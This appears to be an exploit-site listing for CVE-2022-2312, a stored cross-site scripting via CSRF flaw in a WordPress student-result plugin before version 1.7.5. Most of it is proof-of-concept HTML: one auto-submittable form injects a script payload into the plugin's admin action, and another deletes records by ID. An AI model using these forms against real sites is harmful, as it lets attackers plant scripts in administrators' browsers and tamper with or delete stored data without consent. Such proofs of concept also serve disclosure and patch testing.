Exploit for Student Result or Employee Database < 1.7.5 - Stored Cross Site Scripting via CSRF CVE-2022-2312

Name: Exploit for Student Result or Employee Database < 1.7.5 - Stored Cross Site Scripting via CSRF CVE-2022-2312
Rating: 5 (75 reviews)

2022-08-01 | CVSS 0.8

## https://sploitus.com/exploit?id=WPEX-ID:7548C1FB-77B5-4290-A297-35820EDFE0F8
<html>
  <body>
    <form action="https://example.com/wp-admin/admin.php?action=ssr_add_st_submit" method="POST">
      <input type="hidden" name="rid" value='<script>alert(/XSS/)</script>' />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

<html>
  <body>
    <form action="https://example.com/wp-admin/admin.php?action= ssr_del_st_submit" method="POST">
      <input type="hidden" name="postID" value="<RID>" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>